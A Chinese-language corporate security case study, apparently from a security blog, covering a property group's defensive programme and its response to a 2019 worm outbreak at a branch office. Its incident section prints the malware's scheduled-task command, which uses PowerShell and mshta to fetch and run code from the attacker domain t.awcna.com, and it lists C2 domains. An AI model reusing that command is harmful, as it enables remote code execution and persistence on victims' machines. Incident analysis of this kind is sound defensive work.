某大型集团企业信息安全实践总结暨信息安全应急案例分享

第一部分、概述

某大型房产公司，业务遍布港澳及内地70余个城市及海外多个国家和地区。

该企业自2017年以来，将加快信息化建设步伐进行数字化转型当作重要战略举措，逐步加大信息化预算，实现数据智联、创新赋能，支撑管理变革、引领业务创新。

信息安全是企业数字化转型过程中不可避免或忽视的问题,决定企业数字化成败的关键。在这个过程中，数据成为企业非常重要的资产，信息安全对于企业发展有不可估量的影响，企业的安全体系的构建是一个动态、长期的过程，难以一蹴而就。如何从战略层面、治理层面、执行层面上，全面、积极、有效地应对安全风险的同时，将风险转化为机遇，推进数字化转型的持续性发展，可谓任重而道远。为了达到目的，该公司快速组建了信息安全团队，在数字化转型的过程中，不遗余力地推进了信息安全的建设。

经过近三年的建设，该企业已经找到了适合自己的信息安全建设之路，以《网络安全法》的实施为契机，顺应等级保护标准要求，加强全方位主动防御、整体防控，实现对等保护对象的安全全覆盖，从事后补救到安全前置，从局部分割到全面防护，从被动安全到主动安全的转变，构筑主动、全面的安全防护体系，为数字化转型保驾护航，这就是某大型房产公司数字化转型之后交出的信息安全答卷。

在具体建设步骤方面,从聚焦核心数据保护诉求出发，在信息化战略规划层面将信息安全建设分为筑围墙、坚堡垒、精管控三个阶段逐步推进，首先按照等级保护要求，进行了核心系统的等级保护测评工作，2018年顺利完成测评整改，取得了测评证书，2019年更是启动了云平台的三级等保测评工作；在基础架构安全建设方面，上线网络流量回溯分析系统、WEB应用防火墙、运维审计堡垒机等，迅速在总部形成了护城河，公司整体的安全防御能力得到大大提升。

针对员工信息安全意识薄弱问题，开展了长期的信息安全宣贯，通过OA内网、移动门户APP等多种方式推送安全小知识以及公司安全制度等，连续三年开展了“网络安全周”宣传活动，通过线上、线下跨平台、全方位的宣传，使得信息安全理念深入人心，在公司上下初步形成了“信息安全、人人有责”的文化氛围，全面提升了员工的信息安全意识。

在信息化高速发展的同时，黑产也在不断进化，高级恶意代码以快速变种、多样化和动态交互的形式不断演化，虽然该企业已经建设了较为完善的纵深防御体系，但是面临的风险和威胁依然众多，包括如下：

1、安全攻防能力极度不对等，如恶意代码，和传统病毒相比，变种更多、更新更快，传统检测方式更难发现；同时黑客攻击更多的具备“海陆空”（不同攻击载荷、攻击方式、攻击维度）、全天候、全方位打击的特点，依靠单一的安全产品品或边界防护往往无法满足企业安全需求；

2、地区公司防护薄弱，地区公司通过MPLS-VPN专线与总部进行互联，同时各地区公司也有自己的互联网出口进行上网，这样带来了诸多的风险；由于安全预算、人力的限制，地区公司没有专职的安全团队，往往很难进行高效的风险防范；

3、内网平坦化问题：目前该企业内网连接着60多家地区公司，同时还与集团公司内部兄弟公司等通过MPLS VPN进行连接，各公司安全建设水平参差不齐，更多的是注重网络侧的边界防御，而内部跨区防护，往往被选择性忽视。在实际攻防场景中，再“高”再“厚”的墙也终将被绕过。一旦攻击者突破某个地区公司边界取得初步权限，内部安全能力的真空很容易导致集体沦陷，攻击者进入内网之后横向渗透，往往一马平川，无往不利；

4、单点安全能力永远存在漏报和误报的问题。即使当前攻击被阻断，道高一尺魔高一丈，攻击者经过一段时间的研究，也有可能绕过防护。而安全设备和业务系统兼容是一个长期的磨合过程，必然会导致出现无效告警，而真正有效的告警，往往被淹没其中。

第二部分、该企业信息安全建设思路

为有效应对目前面临的问题和满足安全迫切需求，我们需要利用基于大数据机器学习技术对已知威胁进行模式挖掘，然后通过专家分析，提取恶意行为并输出安全能力，具备威胁情报检测、网络异常检测、入侵检测、主机行为检测等多种安全能力，从“端、边界、云”的空间维度上以及 “预警、监测、分析、清除”的时间维度上实现安全防护的闭环管理，真正做到 “全面防御、主动预警、安全运营，全天候、全方位感知网络安全态势”。

为了达到这个目标，我们制订了企业信息安全宙斯盾计划，从如下几个方面进行了安全建设，包括：

攻防侧：收敛攻击面，具备有效防护各类已知攻击的能力；

网络侧：具备覆盖全部网络协议栈的分析、检测和分析回溯能力，能够覆盖全部边界和MPLS VPN互联的链路；

主机侧：以业务主机（服务器）为安全防御重点，构建最后一公里防线，快速搭建自适应防御体系；

终端侧：建立终端安全防御体系，同时通过检测网络流量中的DGA域名，定位网络内部已经被控的主机。

安全域划分：基于零信任网络原则，进行层次化划分，尤其是对内网互联的网络进行有效隔离，防止堡垒从内部被突破，打造不被绕过的马奇诺防线。

第三部分、该企业信息安全建设具体成果

在我们近三年的安全建设成果来说，基本行动计划包括如下：

（1）坚壁清野步步为营

面对上面所面临的风险，在总部数据中心层面，通过开展敏感信息清理、网络资产摸底清理、收敛网络攻击暴露面、安全风险排查整改、重点目标防御等专项工作，同时配合常态化的漏洞扫描工作，逐步整改安全漏洞，淘汰下线不安全业务系统；对安全设备策略进行有效收紧，形成了漏洞收敛、防护有效、保障有力的安全局面。

目前公司总部对外互联网IP 150+个，互联网带宽150Mbps，业务系统60+个，累计一年防御DDOS攻击252万余次，拦截网络层攻击2160万次，拦截应用层攻击72万余次；

（2）诱敌深入层层设防

为了解决内网攻击以及未知威胁问题，公司总部上线了开源的蜜罐系统T-Pot,恶意代码和行为检测作为抵御黑客和网络犯罪分子防御的第一道防线。它主要应用特征库和行为的辨别技术，不可避免的带来误报和漏报的问题。蜜罐系统则有效的避免了这个问题，通过构建伪装的业务主动引诱攻击者，在预设的环境中对入侵行为进行检测、分析，还原攻击者的攻击途径、方法、过程等，并将获取的信息用于保护真实的系统；

通过蜜罐系统，利用欺骗防御技术，经过精密设计，在恶意黑客必经之路上布置诱饵节点，混淆其攻击目标，从而隔离并保护企业真实资产，拖延黑客攻击时间。

蜜罐系统能够高精度、准确无误地发现潜在威胁，捕获威胁后将在第一时间报警，速度优于传统安全防护手段，用蜜罐获取到攻击者信息，比如攻击者的 IP，就可以通过防火墙及WAF设备对攻击来源进行封堵。

该企业部署蜜罐系统以来，全年捕获各种攻击40万+次，攻击IP 2800+个，与防火墙、WAF等形成良好互补。

图：蜜罐捕获到的暴力破解用户名和密码

（3）内网隔离纵深防御

针对内网平坦化问题，我们通过进行安全域划分方式，对内网进行了初步隔离，对来自地区公司和兄弟公司的互联请求不再采取默认放行规则，而是基于零信任网络原则，进行层次化划分，防止病毒木马纵向感染横向传播。

通过子公司网络规范,落实子公司边界安全防护体系，各地区分公司互联网出口处部署了防火墙，终端层面部署了防病毒软件，完成全公司4000+终端防病毒软件部署；同时定期推进专项巡检工作，对地区公司进行终端安全扫描，对发现的存在高危漏洞的终端进行督促整改；日常工作中，对地区公司发现感染僵尸、木马、蠕虫的终端进行及时通报整改。

根据部署在边界、终端、云网络、专线网络的各种安全设备的特点，有的放矢设计对应的检测手段，扬长补短，充分发挥数据联动分析的作用，建立了较为完善的纵深防御体系，形成了横向到边、纵向到底的立体防御框架并切实落地，达到较好效果。

（4）万物皆明精确感知

再高级的攻击，都会留下网络痕迹，因此，进行网络全流量分析是精确感知安全的一个非常好用的手段，全流量威胁分析回溯系统能够快速检测各类重点事件，如APT攻击事件、Botnet事件、恶意样本传播、WebShell、隐蔽隧道等高危安全事件。以流量行为为例，正常网络层的连接行为是松散的、随机分布的，如下图：

而异常连接的情况下，比如终端感染木马并成为僵尸主机之后将对同网段和外网进行扫描攻击，其连接行为将会如下：

通过如上规则，在流量分析回溯系统上可以很好的进行预警，及时定位网络内部已经被控的主机。

同时，流量分析回溯系统可以很好的进行C&C服务器访问监控（Command & Control Server，是指挥控制僵尸网络的主控服务器）。每个木马实例通过和它的C&C服务器通讯获得指令进行攻击活动，包括获取攻击开始的时间和目标，上传从宿主机偷窃的到的信息，定时给感染机文件加密勒索等。

通过引入外部威胁情报，与自身流量分析回溯系统有机结合，很好的解决了分支机构的僵尸网络问题。目前，我们已经成熟应用基于域名、IP地址、样本特征等进行失陷检测，将远控或者恶意下载的各类IP、域名和URL进行一键拦截和预警，同时可将失陷主机与外网通信、在内网进行传播扩散与渗透、最终达成攻击目标的全过程完整绘制出来。

（5）情报驱动安全联动

在网络安全体系的建设过程中，是一个由点到面的过程，上线过程中不同厂家不同品牌的安全设备会不可避免的处于分散状态，而不是天然的具备联动机制；而单点安全能力永远存在漏报和误报的问题；我们在三年的安全建设和安全运营过程中，也发现了这个问题，往往需要投入大量人力进行各种设备的策略调优，如攻击者突破了防火墙和WAF设备的第一道防线后，虽然被流量分析系统和蜜罐发现，但是往往需要安全管理员手工处理告警，来进行IP拦截，时效性无法得到保证，安全源于联动，各自为营．怎能协同工作?

为了解决这个问题，我们宙斯盾计划的核心就是通过威胁情报建立各安全设备的联动机制，实现安全协同、全网联动。

在这个建设过程中，我们引入互联网大情报体系，对情报信息进行强度整合、高度共享、深度运用；同时结合防火墙、WAF、流量分析系统、态势感知、蜜罐等集中告警日志处理，借助技术中台，建立小情报体系（私有云），这个私有情报系统，我们也称之为安全中台雏形，既能够实时调用防火墙、WAF接口进行联动处理，也能够对外提供给集团各兄弟公司使用，极大程度上缩减了安全事件的处理时间，能够以最高效的方式解决安全问题。

通过这样的安全设备联动管理，能够保证系统内的安全设备协同工作,提高安全事件的检测精度和处理效率,从而应对日趋复杂多变的网络安全威胁。

（6）应急响应全网协防

我们进一步健全完善了网络安全事件监测发现、通报预警、应急处置一体化机制；在安全运营过程中，监测只是第一步，后续还有处置、溯源、修复、优化等一系列过程，对需要对待处理事件区分优先级，形成小时级、日级、周级、月级处理机制，让重要事件得到及时解决。

对于实时发生的失陷事件，不断恶化的安全事件，我们将全网预警，提高应急响应级别，及时将信息安全事件扼杀在萌芽状态。

对于漏洞扫描、基线核查、安全更新等工作，我们已经形成周期性任务执行，按季度进行常规化跟踪、处理。

同时我们推行各种专项行动，如密码安全专项检视计划、全网终端安全扫描行动、渗透测试、安全演练等，及时掌握和解决影响网络安全运行方面出现或存在的有关问题，提升安全防护水平。

下面，通过一个典型的信息安全案例，来介绍该企业信息安全建设成果及相关经验总结，这个实战案例，既是对过往安全建设的成果检验，也为后续的安全体系建设提供了宝贵的经验。

第四部分、真实信息安全应急事件案例分享

12月2号凌晨，分支机构上海公司将一台文件共享服务器的远程桌面端口违规暴露在公网，被攻破之后导致当地大量终端感染变种木马，并在网络内部大量扩散攻击行为（累计感染50多台，占比近50%），总部通过流量分析系统及威胁情报服务、蜜罐服务进行了第一时间预警，在防火墙和防病毒软件未能够彻底防御此变种木马的情况下，经过2天的应急响应，已基本完成终端的查杀和加固，未对集团内网造成较大影响。

本次案例中，总部通过流量分析系统及威胁情报服务，第一时间发现了上海公司终端的DNS域名异常访问行为并预警（木马通过C&C服务器地址通讯获取远程控制命令），部署的蜜罐服务发现了上海公司中毒终端对总部数据中心的横向渗透攻击，并捕获了其攻击手法（木马综合利用MS17-010永恒之蓝漏洞攻击、SMB爆破攻击、sql爆破攻击等功能,并在攻击成功的目标机器上安装计划任务执行多个Powershell后门,下载执行新的攻击模块）；由于总部防火墙的安全域划分有效，策略有效收紧，内网未出现部分终端中毒后一马平川的攻击局面，其余地区公司大部分也在前期的专项行动中进行了加固，未造成大规模横向渗透。

经过本次实战检验，验证了该企业纵深防御体系和监控应急预警体系的有效性。通过对该事件的总结和反思，形成信息安全可借鉴的经验和教训，有利于大家共同提升安全水平。

• 病毒名：驱动人生新变种
• 感染方式：该病毒通过“永恒之蓝”漏洞扫描445端口传播，通过暴力破解传播密码方式传播，通过RDP远程桌面3389端口漏洞传播，通过扫描Sql Server数据库方式传播；
• 后果影响：感染内网之后，将进行横向渗透扫描，并在每个感染终端上增加计划任务，每个小时从后台接受指令，下载攻击木马，同时进行挖矿行为，不排除进行文件勒索比特币等行为；
• 处置：总部监控发现之后提升预警级别，并要求上海公司断网，升级杀毒软件版本，地毯式对终端进行查杀，3号晚上完成网内病毒传播抑制。
• 后续总结：上海公司防火墙维护不及时，策略未收紧，且将重要的文件共享服务器（10.164.1.8）的远程桌面端口暴露在公网；内网终端补丁更新不及时，未按照总部要求进行MS17-010漏洞及MS19-0708漏洞的彻底整改；PC存在弱口令，员工安全意识不高，均给病毒横向渗透造成较大便利。

第五部分、安全事件处置及朔源过程

1. 事件时间轴

本次总部通过威胁情报、蜜罐及流量分析系统，较好的进行了本次监控应急预警，也对后续的安全体系建设提供了宝贵的经验。

时间

事件

2019-12-02 4:46

黑客通过暴露在公网的远程桌面进入文件服务器10.164.1.8，并安装了木马服务（事后在服务器系统日志找到该安装记录）

2019-12-02 4:57

总部威胁情报系统收到第一个DNS告警：10.164.1.8 尝试访问驱动人生域名：t.awcna.com 与上一条日志匹配，可以认定10.164.1.8为第一个被攻击的源头

2019-12-02 5:01

木马继续进行横向渗透，总部威胁情报系统收到第二台终端告警：10.164.2.15 请求域名 t.awcna.com

2019-12-02 5:02

总部威胁情报系统收到第三台终端告警：10.164.2.116 请求域名 down.ackng.com

2019-12-02 5:19

总部威胁情报系统收到第四台终端告警：10.164.2.13 请求域名 down.ackng.com

2019-12-02 5:27

总部威胁情报系统收到第五台终端告警：10.164.2.56 请求域名 t.awcna.com

2019-12-02 5:28

总部威胁情报系统收到第六台终端告警：10.164.2.91 请求域名 t.awcna.com

…………上述攻击防火墙和杀毒软件均未能有效防御

2019-12-02 6:48

总部蜜罐系统收到来自10.164.2.15的利用永恒之蓝445端口的漏洞攻击，说明木马已经开始全网扫描

2019-12-02 6:50

总部蜜罐系统收到来自10.164.2.33的利用远程桌面3389端口以及Sql Server 的漏洞攻击，说明木马已经开始尝试攻击总部数据中心的服务器及数据库

…………上班之后上海公司终端逐步开机，感染面积加大

2019-12-02 9:00

总部人员上班之后发现告警，初步判断为信息安全事件，在信息化管理员职能线进行通报预警

2019-12-02 9:30

经过多方面判断之后，提升预警级别，将18台电脑中毒IP和相关信息，通过邮件发送给上海公司人事行政部负责人，并抄送总经理，要求尽快响应找到终端

2019-12-02 10:30

上海公司管理员找到多台终端，通过防病毒软件扫描均无法查杀

2019-12-02 11:00

紧急联系防病毒厂家，厂家协调上海办事处人员到现场处置，承诺一个小时到位

2019-12-02 12:00

厂家人员到位之后，配合信息化管理员进行终端查杀，并联系研发后台定位

2019-12-02 下午

厂家人员出具处置手册，按照处置手册通过专杀工具进行一一查杀

…………由于网络内大量终端中毒，出现杀毒后又重复被感染现象

2019-12-02 晚上

待视频会议结束之后，晚上9点将上海公司断网，挨个逐台进行专杀工具处理，到晚上11点之后完成30台左右终端处置，由于财务等楼层关门，留待第二天处理

2019-12-03 01：00

防病毒厂家反馈，需要将杀毒软件版本从6.3.2.8000升级到6.3.2.8300，可以强制杀掉病毒的周期任务

2019-12-03 09：00-12：00

总部进行监控，发现的终端交给当地管理员进行拔掉网线断网，同时配合厂家工程师进行查杀

2019-12-03 12：00

上海公司杀毒软件版本完成从6.3.2.8000到6.3.2.8300的升级

2019-12-03 下午

升级后的版本查杀效果部分还是不理想，需要手工再次用专杀工具查杀

2019-12-03 晚上9点

基本完成该病毒的抑制，再次查杀26台左右，网络内未发现类似告警，防火墙上将文件服务器的端口映射取消

2. 相关处置过程截图

经10.164.1.8 文件服务器日志分析，发现12月2日 4点46分木马服务被安装

2019-12-02 4:57总部威胁情报系统收到第一个DNS告警：10.164.1.8 尝试访问驱动人生域名：t.awcna.com 与上一条日志吻合和匹配

2019-12-02 6:48 总部蜜罐系统收到来自10.164.2.15的利用永恒之蓝445端口的漏洞攻击，说明木马已经开始全网扫描，并开始尝试攻击总部数据中心的服务器及数据库。

木马服务示例: BCQWCTRQORNYUISBFDKU（名称会随机生成）

服务文件名: %COMSPEC% /C “netsh.exe firewall add portopening tcp 65529 SDNS&netsh interface portproxy add v4tov4 listenport=65529 connectaddress=1.1.1.1 connectport=53&schtasks /create /ru system /sc MINUTE /mo 10 /tn Rtsa /tr “powershell -nop -ep bypass -c ‘IEX(New-Object System.Net.WebClient).DownloadString(\”http://t.awcna.com/ipc.jsp?h\”)'” /F & echo %%path%%|findstr /i powershell>nul || (setx path “%path%;c:windowssystem32WindowsPowershellv1.0” /m) &schtasks /run /tn Rtsa & ver|findstr “5.[0-9].[0-9][0-9]*” && (schtasks /create /ru system /sc MINUTE /mo 60 /tn Rtas /tr “mshta http://t.awcna.com/p.html?_%%COMPUTERNAME%%“)”

木马服务为防止被删掉，每个小时重复执行下载指令

在总部防火墙上看到的感染终端对总部的3389端口扫描

第六部分、经验教训总结

由于终端的安全极大的影响了整个数据中心安全，多个网络安全事件及蠕虫均由终端感染导致，同时IOT设备的蠕虫也逐渐增多，需要加大安全整改力度，确保终端安全。

在此次事件中，我们进行了经验总结如下：

1、 好的实践经验

已经初步构建网络安全纵深防御体系,形成横向到边、纵向到底的立体防御框架。

• 在总部，已经上线了防火墙、DDOS防护设备、WAF等防护设备，同时也上线了流量分析回溯系统，并对接了威胁情报服务；为了有效监控恶意行为及未知的攻击，上线了蜜罐系统，与防火墙和WAF形成良好互补；
• 通过子公司网络规范,落实子公司边界安全防护体系，建成终端安全防御体系，完成全公司4000+终端防病毒软件部署；
• 对集团内网网络进行有效隔离，杜绝内网平坦化，禁止了高危端口445、1433、3389等访问；
• 专项行动:对地区公司进行终端安全扫描及加固；
• 日常监控和督办，在日常工作中，对地区公司感染僵尸、木马、蠕虫的终端进行通报并整改；

2、 存在的不足

本次也反映出，安全形势较为严峻，后续需要采取回头看的方式，常态化的检查终端安全状况，包括如下：

• 地区公司的信息安全防御体系还属于薄弱环节，仅仅依靠防火墙、防病毒的单一防护手段依然不够，还需要建立监控、预警和响应体系；
• 员工的信息安全意识还需要进一步加强，应结合网络安全形势与地区公司实际进行有针对性的信息安全培训，切实提高员工安全意识，保密密码安全、上网安全、邮件安全等知识普及；
• 地区公司的安全专项行动依然不够，需要进行常态化的安全扫描、安全加固工作；
• 监控和应急响应是安全必不可缺的一环，需要加强人员、资产投入，同时进行定期演练。

网络攻防、事件处置等是安全工作的一个基础安全工作，但是同时也是较大压力的一环，一旦安全风险无法控制，可能导致“满盘皆输”。安全运营建设既离不开人、财、物的投入和机制建设，更需要安全运营团队技术能力的提升。谨以此案例提供借鉴，以便有助于实现企业安全战略，更好地保障企业业务安全稳定运行。

原文链接：https://www.anquanke.com/post/id/196200